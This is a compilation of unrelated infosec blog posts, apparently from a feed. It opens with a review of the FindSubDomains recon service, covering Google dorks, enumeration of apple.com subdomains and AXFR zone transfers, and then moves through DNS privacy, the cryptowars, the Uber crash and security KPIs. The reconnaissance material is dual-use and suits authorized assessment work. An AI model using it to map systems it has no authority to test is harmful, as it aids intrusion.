Many of us are in the security consulting business, or bug bounties, or even network intelligence and have now and then come across a need to find subdomains. The requirement can be from either side of the table - a consultant assessing a client's internet presence, or a company validating its own digital footprint. In more than a decade, it has happened so many times that people are not aware of what old assets are they running, and hence can be exploited to either damage the brand image, or actual networks. These assets can also be used as the proxy or hops to gain access to thought-so-well guarded data.

Most common way to search for subdomains (that I have used) so far is old school Google search with dorks: site:example.com. To dig deeper, iterate it with all visible subdomains from results, i.e. site:example.com -www or site:example.com -www -test. It will exclude example.com, www.example.com and test.example.com and so on. Later I found some more tools like, Pentest Tool Subdomain, DNS Dumster, Cloudpiercer, Netcraft etc. All these tools are either expensive or don't do the job well. Meh!

Finally, while having a conversation with the SPYSE team (the astounding squad behind CertDB project) and I got to know about their new project - FindSubDomains, a free and fantastic tool/ project to find subdomains for a given domain. Last time I covered their CertDB project in detail, and now after being impressed by FindSubDomains, it was time to review and share with you this excellent tool! It not only lists subdomains but a whole lot of intelligence behind it like,

  1. IP Addresses
  2. DNS records
  3. Countries
  4. Subnets
  5. AS Blocks
  6. Organization names etc.

Any of these parameters can be used to filter the list of subdomains, or search - I mean, it's terrific!

But how does this stack against the common known tools? Let's find out. For the sake of testing, let's take the domain apple.com and try finding the subdomains with different tools/ mediums. Let's start with old school google search,

Finding subdomains for open source intelligence and pentest

Only after 4-5 searches/iterations, it became a tedious process. And, when you try to automate it; Google merely pops up re-captcha challenge. In general, it's worth to search few targeted domains, but worthless to query wild subdomains. Not recommended for such tasks!

How about using the pentest-tools tool? First thing first, it is not a free service and would require you to buy credits. I just performed a free search, and the results were not convincing with pentest-tools,

Finding subdomains for open source intelligence and pentest

After the search, it could only find 87 subdomains of apple.com, and the details included subdomain and respective IP addresses. Netcraft and DNSDumster also had the same disappointing results - the first found 180 records with no scope to download or filter them, and the later was capped at 150 results with lousy UI/UX. To summarise none of the tools could deliver a straightforward and intelligent list of subdomains.

FindSubDomains: Is it any different; any better?

To give you a straight answer - Hell yes! Kudos to the SPYSE team, it is way better than the ones I were using before.
The same apple.com subdomain search performed via FindSubDomains resulted in 1900+ results. It is remarkable!

I mean when others failed miserably to provide even 200 results, FindSubDomains just nailed it with 1900+ results. Bravo!

Finding subdomains for open source intelligence and pentest

All of these 1900+ results are at your disposal without paying a single cent, pop-up advertisement, credits or cap etc. You not only can list these results on the UI but also download them as TXT file. Also, you can view the IP address, geographical region, IP segment and respective AS block details for each subdomain. That is some remarkable open source intelligence in a second without scripts or endless iterations!

To me, the SPYSE team 100% justify their project objective,

FindSubDomains is designed to automate subdomains discovering. This task often comes before system security specialists who study the company in the form of a black box in order to search for vulnerabilities, as well as for marketers and entrepreneurs whose goal is to competitively analyze other players on the market in the hope of quickly learning about the emergence of a new vector in the development of a competitor, as well as obtaining information about the internal infrastructure.

FindSubDomains: Search and Filter

On top of the search, their filters are amazing if you have to search specific information on a domain, subdomain or it's respective fields as discussed. They also have some pre-filtered results or trivia points,

  1. Top 100 sites and their subdomains: https://findsubdomains.com/world-top
  2. Sites with the highest number of subdomains: https://findsubdomains.com/top-subdomain-count
  3. Top countries with the highest number of subdomains: https://findsubdomains.com/countries
    = UNITED STATES: https://findsubdomains.com/world-top?country=US
    = INDIA: https://findsubdomains.com/world-top?country=IN
    = CHINA: https://findsubdomains.com/world-top?country=CN
  4. Top names for subdomains (my favourite) or most common subdomains: https://findsubdomains.com/top-subdomain-name-count

The last one is convenient when network surveying a client, or shocking client with their digital footprint.
Finding subdomains for open source intelligence and pentest

FindSubDomains: Dashboard and Custom Tasks

Now, when I signed-in (sign-up is easy) I was welcomed by a Dashboard which shows Total, Ongoing and Remaining tasks. I can start a new task by either using the domain or a word to search. The word search is great if I don't know the complete domain name. This task executing capability is to supplement anything you don't find on their main page, or existing database (which believe me is huge). For every task, it can list up to 50,000 subdomains for and takes around 6 minutes (you can setup alert, and the platform will notify you via email on its completion).

To execute the task of finding subdomains, it uses various techniques,

  1. Many subdomains can be defined using the site's crawling and analyzing its pages, as well as resource files;
  2. AXFR (DNS Zone Transfer) requests for some domains often reveal a lot of valuable information about them;
  3. Search and analysis of historical data often matches with the search term.
    Finding subdomains for open source intelligence and pentest

While the tool is impressive, and I can't repeat enough; I would have appreciated the capability to execute the tasks via an API, and having some programmable way to automate via command-line/ terminal. I know, I may find ways to do with curl, but API key would have made things more comfortable, and convenient.

FindSubDomains: Usage Scenarios

Here are some scenarios I can use this tool,

  1. During pentest reconnaissance phase, collecting information on the target network.
  2. As a supporting tool to gather network intelligence on firms and their respective domains.
  3. Assessing your company's network, and digital footprint. Many a times you will be surprised to find the wide unaccounted exposure.
  4. Keeping a track of external facing subdomains - UAT, SIT, STAGING etc. which ideally should either be locked down or white-listed. Imagine how insecure are these platforms which often even contain production data.

To summarize, this is yet another amazing tool after CertDB which shows the potential of SPYSE team. The FindSubDomains has made my search so easier and efficient. I would highly recommend the readers to use this tool in finding subdomains.

Cover Image Credit: Photo by Himesh Kumar Behera

Cyclists Defeat Cars in Urban Speed Challenge

This should be obvious to anyone who rides a bicycle in a city. Alas we also have studies to prove it true, year after year:

Since the event began in 2009, one mode has ruled supreme in terms of speed.

“People on bikes have beaten their car-driving counterparts more than two-thirds of the time,” Jane says. “A lot of people are surprised by that, because they don’t realize how fast and convenient cycling for transportation can be.”

This is confirmed by a 2017 study from the German Federal Environmental Agency, which determined that–in an urban setting–bikes are faster than cars for trips up to five kilometres. As it turns out, drivers vastly underestimate time spent sitting in traffic, searching for parking, and walking to their final destination.

Two-thirds is a crushing defeat for cars, and that’s simply measuring performance. When you add in the health and environment benefits it begs the question what people really value when riding in a car in a city.

Cyberspace Intervention Law and Evolving Views

I’m putting two opinion pieces by the esteemed Michael Adams together and getting an odd result.

While reflecting on “detailed analysis that is being conducted at USCYBERCOM, across agencies and at events like the Cyber Command legal conference”, Michael opines that the US has taken no position on whether it would come to the aid of a victim, or side with an aggressor, when confronted with cyberattack.

The U.S. asserts that extant international law, to include International Humanitarian Law (IHL) applies to cyberspace, but it has yet to offer definitive guidance on what cyberattacks, short of those causing obvious large scale kinetic destruction, constitute a prohibited use of force or invoke the LOAC. While the Tallinn Manual 2.0 may be the most comprehensive treatise on the applicability of international law to cyberspace thus far, it was developed without the official participation of, and has not been sanctioned by, States. The U.S. Government, for example, has taken no official position on the views set forth in the Manual.

Meanwhile, an earlier opine tells us taking action with fire-and-forget remote missiles hitting a far away target while not trying to “use the law as a shield”…deserves something akin to his respect:

…from the perspective of a lawyer who has advised the highest levels of military and civilian officials on literally thousands of military operations, there is something to be said for a client that refuses to use the law as a shield for inaction and that willingly acknowledges that other factors weighed most heavily on his or her decisions.

Maybe I’m reading too much into the theme across work here, but I get a sense if the aggressor is far enough removed from accountability, let alone retaliation, then long-distance attack wouldn’t bring an urge to bother with any shields including the law. This surely is the attraction to “swivel-chair” aggressors of using missiles and keyboards. Perception of their inaction in a lawyer’s eye is erased simply by pushing a button even when a chance of success is as remote as their targets.

Origins of “Information Security”

I’ve promised for a while, years really, to write-up the etymology of the word “hacker”. This always is a popular topic among the information security crowd. Although I regularly talk about it at conferences and put it in my presentations, the written form has yet to materialize.

Suddenly I instead feel compelled to write about a claim to the origins of the phrase “information security”. Credit goes to the book “Code Girls” by Liza Mundy, a bizarrely inaccurate retelling of cryptography history. While I don’t mind people throwing about theories of why hacker came to be a term, for some reason Mundy’s claim about “information security” shoves me right to the keyboard; per her page 20 Introduction to the topic:

[The 1940s] were the formative days of what is now called “information security,” when countries were scrambling to develop secure communications at a time when technology was offering new ways to encipher and conceal. As in other nascent fields, like aeronautics, women were able to break in largely because the field of code breaking barely existed. It was not yet prestigious or known. There had not yet been put in place elaborate systems of regulating and credentialing–professional associations, graduate degrees, licenses, clubs, learned societies, accreditation–the kinds of barriers long used in other fields, like law and medicine, to keep women out.

First of all, the reader now expects to see evidence of these “elaborate systems of regulating and credentialing” with regard to information security. I suspect Mundy didn’t bother to check the industry because there are none. Quite the opposite, the CISSP is regularly bashed as entry-level and insufficient proof of information security qualification, and experts regularly boast of having orthogonal degrees or none at all.

Second, she’s contradicting her own narrative. Only a page earlier she’s holding the field of code breaking as “storied British operation that employed ‘debs and dons’: brilliant Oxford and Cambridge mathematicians and linguists–mostly men, but also some women…”. So which is it? Information security was not prestigious and known, or it was a “storied” field of the highest caliber schools?

As an aside I also find it frustrating this book about recognizing women of code breaking calls Bletchley “mostly men, but also some women”. The British operation was resistant at first to women and the same dynamics as in the US shifted the balance, as the site itself will tell you:

The Bletchley Park codebreaking operation during World War 2 was made up of nearly 10,000 people (about 75% of this number was women). However, there are very few women of that are formally recognised as cryptanalysts working at the same level as their male peers.

Mundy dismisses this as “…there also were thousands of women, many from upper-class families, who operated ‘bombe’ machines…” almost as if she’s buying into a boorish and misogynist narrative dismissing the code breaking capabilities as “some women” and tossing out the rest as a bunch of wealthy knob turners. Who does she think went to Oxford and Cambridge? Meanwhile Bletchley historians tell us about the women “codebreaking successes and contribution to the Battle of Cape Matapan, which put the Italian Navy out of World War 2”.

Mundy also gives credit only to the British operation for breaking Enigma, which is patently false history as I’ve written about before.

So, third, she mentions the US resurrected its code breaking from WWI. This punches a hole through her theory that information security origin was 1940s. Not only does a link to WWI indicate the field is older, it begs the question why she would even suggest such a late start date when there are also sources linking it to the US Civil War and earlier?

Enigma cracking started at the end of WWI and the Polish put their top mathematicians on it because they recognized relevance to the threat from a neighboring state, as history tends to repeat. The British focused on Spanish and Italian code-breaking in the 1930s because Franco and Mussolini were more interesting to them as threats to their domain. Mundy hints at this on page 14 when she admits information security students of the 1940s relied on earlier work:

The instructors would be given a few texts to jump-start their own education, including a work called Treatise on Cryptography, another titled Notes on Communications Security, and a pamphlet called The Contributions of the Cryptographic Bureaus in the World War–meaning World War I…

Anyway, aside from these three fundamental mistakes, a core piece missing from her analysis is that the US fell behind on code breaking and had to catch up because of isolationist tendencies as well as white supremacists in the US pressuring their country to remain neutral or even assist with Nazi aggression. Mundy mentions this briefly on page 13 and sadly doesn’t make the political connections.

[Captain, U.S.N. Laurance Frye] Safford elaborated on the qualifications they wanted by spelling out the kind of young women the Navy did not want. “We can have here no fifth columnists, nor those whose true allegiance may be to Moscow,” Safford wrote. “Pacifists would be inappropriate. Equally so would be those from persecuted nations or races–Czechoslovakians, Poles, Jews, who might feel an inward compulsion to involve the United States in war.”

Again Mundy is citing information security field expertise that existed long before the 1940s. And you have to really take in the irony of Safford’s antisemitism and political position here given that it comes after Polish cryptographers already had cracked Enigma and were the foundation to Bletchley Park focus on German cryptography. Further to the point, as the NSA history of Safford claims, he saw himself as the person who actively tried to involve the United States in war.

He recognized the signs of war that appeared in the diplomatic traffic, and tried to get a warning message to Pearl Harbor several days before the attack, but was rebuffed by Admiral Noyes, the director of Naval communication.

Several days. A bit late Safford. Imagine how many years of warning he might have had if he hadn’t demanded “persecuted nations or races” be excluded from information security roles.

America was behind because it didn’t perceive itself a persecuted nation, it failed to expend resources on information security in a manner commensurate with the risk. There were pro-Nazi forces actively attempting to undermine or sabotage the US feedback loops by pushing a head-in-sand “neutrality” position all the way to Pearl Harbor.

By the time these “America First” agents of Nazi Germany were exposed and incarcerated, women simply offered a more available home front resource compared with men abruptly being sent to fight in field (same as in Britain, France, Poland etc). Of course women were as good if not better than the men. It was procrastination and the pre-war political position to allow aid Nazi Germany (GM, Standard Oil, etc) that created a desperate catch-up situation, opening the doors to women.

Information security formative days started long before the 1940s, but just like today the absence of feeling threatened led decision makers to under-invest in those who studied it, let alone those who practiced professionally without degrees or certifications. The question really is whether women would have been pulled into information security anyway, even if the US had not been under investing in the years prior. British history tells us definitively yes, as 75% of Bletchley staff were women.

Does that percentage sound high? Mundy herself says on page 20 that 70% of US Army and 80% of US Navy information security staff were women. Fortunately she doesn’t discount the Americans as wealthy knob-turners, and instead glorifies every American woman’s role as essential to the war effort. Mundy writes well, but her history analysis is lacking and sometimes even self-defeating.

Cloudflare Quad 1 DNS is privacy-centric and blazing fast

Cloudflare Quad 1 DNS is privacy-centric and blazing fast

This year I have witnessed too many DNS stories - rising from the Government censorship programs to privacy-centric secure DNS (DNS over TLS) in order to protect the customers' queries from profiling or profiting businesses. There are some DNS which are attempting to block the malicious sites (IBM Quad9 DNS and SafeDNS) while others are trying to give un-restricted access to the world (Google DNS and CISCO OpenDNS) at low or no costs.

Yesterday, I read that Cloudflare has joined the race with it's DNS service (Quad1, or 1.1.1.1), and before I dig further (#punintended) let me tell you - it's blazing fast! Initially I thought it's a classic April Fool's prank but then Quad1, or 1.1.1.1 or 4/1 made sense. This is not a prank, and it works just as proposed. Now, this blog post shall summarize some speed tests, and highlight why it's best to use Cloudflare Quad1 DNS.

Quad1 DNS 1.1.1.1 Speed Test

To test the query time speeds (in milliseconds or ms), I shall resolve 3 sites: cybersins.com, my girl friend's website palunite.de and my friend's blog namastehappiness.com against 4 existing DNS services - Google DNS (8.8.8.8), OpenDNS (208.67.222.222), SafeDNS (195.46.39.39), IBM Quad9 DNS (9.9.9.9) and Cloudflare Quad1 (1.1.1.1)

Website Google DNS OpenDNS IBM Quad9 SafeDNS CloudFlare
cybersins.com 158 187 43 238 6
palunite.de 365 476 233 338 3
namastehappiness.com 207 231 178 336 3

Cloudflare Quad 1 DNS is privacy-centric and blazing fast

This looks so unrealistic, that I had to execute these tests again to verify, and these numbers are indeed true.

Privacy and Security with Quad1 DNS 1.1.1.1

This is the key element that has not been addressed for quite a while. The existing DNS services are slow, but as well store logs and can profile a user based on the domains they query. The existing DNS services run on UDP port 53, and are vulnerable to MITM (man in the middle) kind of attacks. Also, your ISP has visibility in this clear text traffic to sensor or monetize you, if required. In the blogpost last weekend, Matthew Prince, co-founder and CEO of Cloudflare mentioned,

The web should have been encrypted from the beginning. It's a bug it wasn't. We're doing what we can do fix it ... DNS itself is a 35-year-old protocol and it's showing its age. It was never designed with privacy or security in mind.

The Cloudflare Quad1 DNS overcomes this by supporting both DNS over TLS and HTTPS which means you can setup your internal DNS server and then route the queries to Cloudflare DNS over TLS or HTTPS. To address the story behind the Quad1 or 1.1.1.1 choice, Matthew Prince quoted,

But DNS resolvers inherently can't use a catchy domain because they are what have to be queried in order to figure out the IP address of a domain. It's a chicken and egg problem. And, if we wanted the service to be of help in times of crisis like the attempted Turkish coup, we needed something easy enough to remember and spraypaint on walls.

Kudos to Cloudflare for launching this service, and committing to the privacy and security of the end-users in keeping short-lived logs. Cloudflare confirmed that they don't see a need to write customer's IP addresses to the disk, and retain the logs for more than 24 hours.

Cheers and be safe.

Privacy protections are needed for government overreach, too

After the unfortunate yet predictable Facebook episode involving Cambridge Analytica, several leaders in the technology industry were quick to pledge they would never allow that kind corporate misuse of user data.

The fine print in those pledges, of course, is the word ‘corporate,’ and it’s exposed a glaring weakness in the privacy protections that technology companies have brought to bear.

Last week at IBM Think 2018, Big Blue’s CEO Ginni Rometty stressed the importance of “data trust and responsibility” and called on not only technology companies but all enterprises to be better stewards of data. She was joined by IBM customers who echoed those remarks; for example, Lowell McAdam, chairman and CEO of Verizon Communications, said he didn’t ever want to be in the position that some Silicon Valley companies had found themselves following data misuse or exposures, lamenting that once users’ trust has been broken it can never be repaired.

Other companies piled on the Facebook controversy and played up their privacy protections for users. Speaking at a televised town hall event for MSNBC this week, Apple CEO Tim Cook called privacy “a human right” and criticized Facebook, saying he “wouldn’t be in this situation.” Apple followed Cook’s remarks by unveiling new privacy features related to European Union’s General Data Protection Regulation.

Those pledges and actions are important, but they ignore a critical threat to privacy: government overreach. The omission of that threat might be purposeful. Verizon, for example, found itself in the crosshairs of privacy advocates in 2013 following the publication of National Security Agency (NSA) documents leaked by Edward Snowden. Those documents revealed the telecom giant was delivering American citizens’ phone records to the NSA under a secret court order for bulk surveillance.

In addition, Apple has taken heat for its decision to remove VPN and encrypted messaging apps from its App Store in China following pressure from the Chinese government. And while Tim Cook’s company deserved recognition for defending encryption from the FBI’s “going dark” effort, it should be noted that Apple (along with Google, Microsoft and of course Facebook) supported the CLOUD Act, which was recently approved by Congress and has roiled privacy activists.

The misuse of private data at the hands of greedy or unethical corporations is a serious threat to users’ security, but it’s not the only predator in the forest. Users should demand strong privacy protections from all threats, including bulk surveillance and warrantless spying, and we shouldn’t allow companies to pay lip service to privacy rights only when the aggressor is a corporate entity.

Rometty made an important statement at IBM Think when she said she believes all companies will be judged by how well they protect their users’ data. That’s true, but there should be no exemptions for what they will protect that data from, and no denials about the dangers of government overreach.

The post Privacy protections are needed for government overreach, too appeared first on Security Bytes.

What Were the CryptoWars ?

F-Secure invites our fellows to share their expertise and insights. For more posts by Fennel, click here

In a previous article, I mentioned the cryptowars against the US government in the 1990s. Some people let me know that it needed more explanation. Ask and thou shalt receive! Here is a brief history of the 1990s cryptowars and cryptography in general.

Crypto in this case refers to cryptography (not crypto-currencies like BitCoin). Cryptography is a collection of clever ways for you protect information from prying eyes. It works by transforming the information into unreadable gobbledegook (this process is called encryption). If the cryptography is successful, only you and the people you want can transform the gobbledegook back to plain English (this process is called decryption).

People have been using cryptography for at least 2500 years. While we normally think of generals and diplomats using cryptography to keep battle and state plans secret, it was in fact used by ordinary people from the start. Mesopotamian merchants used crypto to protect their top secret sauces, lovers in ancient India used crypto to protect their messages, and mystics in ancient Egypt used crypto to keep more personal secrets.

However, until the 1970s, cryptography was not very sophisticated. Even the technically and logistically impressive Enigma machines, used by the Nazis in their repugnant quest for Slavic slaves and Jewish genocide, were just an extreme version of one of the simplest possible encryptions: a substitution cipher. In most cases simple cryptography worked fine, because most messages were time sensitive. Even if you managed to intercept a message, it took time to work out exactly how the message was encrypted and to do the work needed to break that cryptography. By the time you finished, it was too late to use the information.

World War II changed the face of cryptography for multiple reasons – the first was the widespread use of radio, which meant mass interception of messages became almost guaranteed instead of a matter of chance and good police work. The second reason was computers. Initially computers meant women sitting in rows doing mind-numbing mathematical calculations. Then later came the start of computers as we know them today, which together made decryption orders of magnitude faster. The third reason was concentrated power and money being applied to surveillance across the major powers (Britain, France, Germany, Russia) leading to the professionalization and huge expansion of all the relatively new spy agencies that we know and fear today.

The result of this huge influx of money and people to the state surveillance systems in the world’s richest countries (i.e. especially the dying British Empire, and then later America’s growing unofficial empire) was a new world where those governments expected to be able to intercept and read everything. For the first time in history, the biggest governments had the technology and the resources to listen to more or less any conversation and break almost any code.

In the 1970s, a new technology came on the scene to challenge this historical anomaly: public key cryptography, invented in secret by British spies at GCHQ and later in public by a growing body of work from American university researchers Merkle, Diffie, Hellman, Rivest, Sharmir, and Adleman. All cryptography before this invention relied on algorithm secrecy in some aspect – in other words the cryptography worked by having a magical secret method only known to you and your friends. If the baddies managed to capture, guess, or work out your method, decrypting your messages would become much easier.

This is what is known as “security by obscurity” and it was a serious problem from the 1940s on. To solve this, surveillance agencies worldwide printed thousands and thousands of sheets of paper with random numbers (one-time pads) to be shipped via diplomatic courier to embassies and spies around the world. Public key cryptography changed this: the invention meant that you could share a public key with the whole world, and share the exact details of how the encryption works, but still protect your secrets. Suddenly, you only had to guard your secret key, without ever needing to share it. Suddenly it didn’t matter if someone stole your Enigma machine to see exactly how it works and to copy it. None of that would help your adversary.

And because this was all normal mathematical research, it appeared in technical journals, could be printed out and go around the world to be used by anyone. Thus the US and UK governments’ surveillance monopoly was in unexpected danger. So what did they do? They tried to hide the research, and they treated these mathematics research papers as “munitions”. It became illegal to export these “weapons of war” outside the USA without a specific export license from the American government, just like for tanks or military aircraft.

This absurd situation persisted into the early 1990s when two new Internet-age inventions made their continued monopoly on strong cryptography untenable. Almost simultaneously, Zimmermann created a program (PGP) to make public key cryptography easy for normal people to use to protect their email and files, and Netscape created the first SSL protocols for protecting your connection to websites. In both cases, the US government tried to continue to censor and stop these efforts. Zimmermann was under constant legal threat, and Netscape was forced to make an “export-grade” SSL with dramatically weakened security. It was still illegal to download, use, or even see, these programs outside the USA.

But by then the tide had turned. People started setting up mirror websites for the software outside the USA. People started putting copies of the algorithm on their websites as a protest. Or wearing t-shirts with the working code (5 lines of Perl is all that’s needed). Or printing the algorithm on posters to put up around their universities and towns. In the great tradition of civil disobedience against injustice, geeks around the world were daring the governments to stop them, to arrest them. Both the EFF (Electronic Frontier Foundation) and the EPIC (Electronic Privacy Information Center) organizations were created as part of this fight for our basic (digital) civil rights.

In the end, the US government backed down. By the end of the 1990s, the absurd munitions laws still existed but were relaxed sufficiently to allow ordinary people to have basic cryptographic protection online. Now they could be protected when shopping at Amazon without worrying that their credit card and other information would be stolen in transit. Now they could be protected by putting their emails in an opaque envelope instead of sending all their private messages via postcard for anyone to read.

However that wasn’t the end of the story. Like in so many cases “justice too long delayed is justice denied”. The internet is becoming systematically protected by encryption in the last two years thanks to the amazing work of LetsEncrypt. However, we have spent almost 20 years sending most of our browsing and search requests via postcard, and that “export-grade” SSL the American government forced on Netscape in the 1990s is directly responsible for the existence of the DROWN attack putting many systems at risk even today.

Meanwhile, thanks to the legal threats, email encryption never took off. We had to wait until the last few years for the idea of protecting everybody’s communications with cryptography to become mainstream with instant messaging applications like Signal. Even with this, the US and UK governments continue to lead the fight to stop or break this basic protection for ordinary citizens, despite the exasperated mockery from everyone who understands how cryptography works.

Self-Driving Uber Murders Pedestrian

Although it still is early in the news cycle, so far we know from Tempe police reports that an Uber robot has murdered a women.

The Uber vehicle was reportedly headed northbound when a woman walking outside of the crosswalk was struck.

The woman was taken to the hospital where she died from her injuries.

Tempe Police says the vehicle was in autonomous mode at the time of the crash and a vehicle operator was also behind the wheel.

First, autonomous mode indicates to us that Uber’s engineering team now must admit their design decisions led to this easily predictable disaster of a robot taking a human life. For several years I’ve been giving talks about this exact situation, including AppSecCali where I recently mentioned why and how driverless cars are killing machines. Don’t forget the Uber product already was caught ignoring multiple red lights and crosswalks in SF. It was just over a year ago that major news sources issued the warning to the public.

…the self-driving car was, in fact, driving itself when it barreled through the red light, according to two Uber employees…and internal Uber documents viewed by The New York Times. All told, the mapping programs used by Uber’s cars failed to recognize six traffic lights in the San Francisco area. “In this case, the car went through a red light,” the documents said.

This doesn’t sufficiently warn pedestrians of the danger. Ignoring red lights really goes back a few months before the NYT picked up the story, into December 2016. Here you can see me highlighting the traffic signals and a pedestrian, asking for commentary on obvious ethics failures in Uber engineering. Consider how the pedestrian stepping into a crosswalk on the far right would be crossing in front of the Uber as it runs the red light:

Second, take special note of framing this new crash as a case where someone was “walking outside of the crosswalk”. That historically has been how the automobile industry exonerated drivers who murder pedestrians. A crosswalk construct was developed specifically to shift blame away from drivers going too fast, criminalizing pedestrians by reducing driver accountability to react appropriately to vulnerable people in a roadway.

Vox has an excellent write-up on how “walking outside of the crosswalk” really is “forgotten history of how automakers invented”…a crime:

…the result of an aggressive, forgotten 1920s campaign led by auto groups and manufacturers that redefined who owned the city streets.

“In the early days of the automobile, it was drivers’ job to avoid you, not your job to avoid them,” says Peter Norton, a historian at the University of Virginia and author of Fighting Traffic: The Dawn of the Motor Age in the American City. “But under the new model, streets became a place for cars — and as a pedestrian, it’s your fault if you get hit.”

Even more to the point, it was the Wheelmen cyclists of the late 1800s who campaigned for Americas paved roads. Shortly after the roads were started, however, aggressive car manufacturers manipulated security issues to eliminate non-driver presence on those roads.

We’re repeating history at this point, and anyone who cites crosswalk theory in defense of an Uber robot murdering a pedestrian isn’t doing transit safety or security experts any favors. Will be interesting to see how the accountability for murder plays out, as it will surely inform algorithms intending to use cars as a weapon.

Measure Security Performance, Not Policy Compliance

I started my security (post-sysadmin) career heavily focused on security policy frameworks. It took me down many roads, but everything always came back to a few simple notions, such as that policies were a means of articulating security direction, that you had to prescriptively articulate desired behaviors, and that the more detail you could put into the guidance (such as in standards, baselines, and guidelines), the better off the organization would be. Except, of course, that in the real world nobody ever took time to read the more detailed documents, Ops and Dev teams really didn't like being told how to do their jobs, and, at the end of the day, I was frequently reminded that publishing a policy document didn't translate to implementation.

Subsequently, I've spent the past 10+ years thinking about better ways to tackle policies, eventually reaching the point where I believe "less is more" and that anything written and published in a place and format that isn't "work as usual" will rarely, if ever, get implemented without a lot of downward force applied. I've seen both good and bad policy frameworks within organizations. Often they cycle around between good and bad. Someone will build a nice policy framework, it'll get implemented in a number of key places, and then it will languish from neglect and inadequate upkeep until it's irrelevant and ignored. This is not a recipe for lasting success.

Thinking about it further this week, it occurred to me that part of the problem is thinking in the old "compliance" mindset. Policies are really to blame for driving us down the checkbox-compliance path. Sure, we can easily stand back and try to dictate rules, but without the adequate authority to enforce them, and without the resources needed to continually update them, they're doomed to obsolescence. Instead, we need to move to that "security as code" mentality and find ways to directly codify requirements in ways that are naturally adapted and maintained.

End Dusty Tomes and (most) Out-of-Band Guidance

The first daunting challenge of security policy framework reform is to throw away the old, broken approach with as much gusto and finality as possible. Yes, there will always be a need for certain formally documented policies, but overall an organization Does. Not. Need. large amounts of dusty tomes providing out-of-band guidance to a non-existent audience.

Now, note a couple things here. First, there is a time and a place for providing out-of-band guidance, such as via direct training programs. However, it should be the minority of guidance, and wherever possible you should seek to codify security requirements directly into systems, applications, and environments. For a significant subset of security practices, it turns out we do not need to repeatedly consider whether or not something should be done, but can instead make the decision once and then roll it out everywhere as necessary and appropriate.

Second, we have to realize and accept that traditional policy (and related) documents only serve a formal purpose, not a practical or pragmatic purpose. Essentially, the reason you put something into writing is because a) you're required to do so (such as by regulations), or b) you're driven to do so due to ongoing infractions or the inability to directly codify requirements (for example, requirements on human behavior). What this leaves you with are requirements that can be directly implemented and that are thus easily measurable.

KPIs as Policies (et al.)

If the old ways aren't working, then it's time to take a step back and think about why that might be and what might be better going forward. I'm convinced the answer to this query lies in stretching the "security as code" notion a step further by focusing on security performance metrics for everything and everyone instead of security policies. Specifically, if you think of policies as requirements, then you should be able to recast those as metrics and key performance indicators (KPIs) that are easily measured, and in turn are easily integrated into dashboards. Moreover, going down this path takes us into a much healthier sense of quantitative reasoning, which can pay dividends for improved information risk awareness, measurement, and management.

Applied, this approach scales very nicely across the organization. Businesses already operate on a KPI model, and converting security requirements (née policies) into specific measurables at various levels of the organization means ditching the ineffective, out-of-band approach previously favored for directly specifying, measuring, and achieving desired performance objectives. Simply put, we no longer have to go out of our way to argue for people to conform to policies, but instead simply start measuring their performance and incentivize them to improve to meet performance objectives. It's then a short step to integrating security KPIs into all roles, even going so far as to establish departmental, if not whole-business, security performance objectives that are then factored into overall performance evaluations.

Examples of security policies-become-KPIs might include metrics around vulnerability and patch management, code defect reduction and remediation, and possibly even phishing-related metrics that are rolled up to the department or enterprise level. When creating security KPIs, think about the policy requirements as they're written and take time to truly understand the objectives they're trying to achieve. Convert those objectives into measurable items, and there you are on the path to KPIs as policies. For more on thoughts on security metrics, I recommend checking out the CIS Benchmarks as a starting point.

Better Reporting and the Path to Accountability

Converting policies into KPIs means that nearly everything is natively built for reporting, which in turn enables executives to have better insight into the security and information risk of the organization. Moreover, shifting the focus to specific measurables means that we get away from the out-of-band dusty tomes, instead moving toward achieving actual results. We can now look at how different teams, projects, applications, platforms, etc., are performing and make better-informed decisions about where to focus investments for improvements.

This notion also potentially sparks an interesting future for current GRC-ish products. If policies go away (mostly), then we don't really need repositories for them. Instead, GRC products can shift to being true performance monitoring dashboards, allowing those products to broaden their scope while continuing to adapt other capabilities, such as those related to the so-called "SOAR" market (Security Orchestration, Automation, and Response). If GRC products are to survive, I suspect it will be by either heading further down the information risk management path, pulling in security KPIs in lieu of traditional policies and compliance, or it will drive more toward SOAR+dashboards with a more tactical performance focus (or some combination of the two). Suffice to say, I think GRC as it was once known and defined is in its final days of usefulness.

There's one other potentially interesting tie-in here, and that's to overall data analytics, which I've noticed slowly creeping into organizations. A lot of the focus has been on using data lakes, mining, and analytics in lieu of traditional SIEM and log management, but I think there's also a potentially interesting confluence with security KPIs, too. In fact, thinking about pulling in SOAR capabilities and other monitoring and assessment capabilities and data, it's not unreasonable to think that KPIs become the tweakable dials CISOs (and up) use to balance out risk vs reward in helping provide strategic guidance for address information risk within the enterprise. At any rate, this is all very speculative and unclear right now, but something to nonetheless watch. But I have digressed...

---
The bottom line here is this: traditional policy frameworks have generally outlived their usefulness. We cannot afford to continue writing and publishing security requirements in a format that isn't easily accessible in a "work as usual" format. In an Agile/DevOps world, "security as code" is imperative, and that includes converting security requirements into KPIs.

Security is not a buzz-word business model, but our cumulative effort

Security is not a buzz-word business model, but our cumulative effort

This article conveys my personal opinion towards security and it's underlying revenue model; I would recommend to read it with a pinch of salt (+ tequila, while we are on it). I shall be covering either side of the coin, the heads where pentesters try to give you a heads-up on underlying issues, and tails where the businesses still think they can address security at the tail-end of their development.

A recent conversation with a friend who's in information security triggered me to address the white elephant in the room. He works in a security services firm that provides intelligence feeds and alerts to the clients. Now he shared a case where his firm didn't share the right feed at the right time even though the client was "vulnerable" because the subscription model is different. I understand business is essential, but on the contrary isn't security a collective argument? I mean tomorrow if when this client gets attacked, are you going just to turn a blind eye because it didn't pay you well? I understand the remediation always cost money (or more efforts) but holding the alert to a client on some attack you witnessed in the wild based on how much money are they paying you is hard to contend.

I don't dream about the utopian world where security is obvious but we surely can walk in that direction.

What is security to a business?

Is it a domain, a pillar or with the buzz these days, insurance? Information security and privacy while being the talk of the town are still come where the business requirements end. I understand there is a paradigm shift to the left, a movement towards the inception for your "bright idea" but still we are far from an ideal world, the utopian so to speak! I have experienced from either side of the table - the one where we put ourselves in the shoes of hackers and the contrary where we hold hands with the developers to understand their pain points & work together to build a secure ecosystem. I would say it's been very few times that business pays attention to "security" from day-zero (yeah, this tells the kind of clients I am dealing with and why are in business). Often business owners say - Develop this application, based on these requirements, discuss the revenue model, maintenance costs, and yeah! Check if we need these security add-ons or do we adhere to compliance checks as no one wants auditors knocking at the door for all the wrong reasons.

This troubles me. Why don't we understand information security as important a pillar as your whole revenue model?

Security is not a buzz-word business model, but our cumulative effort

How is security as a business?

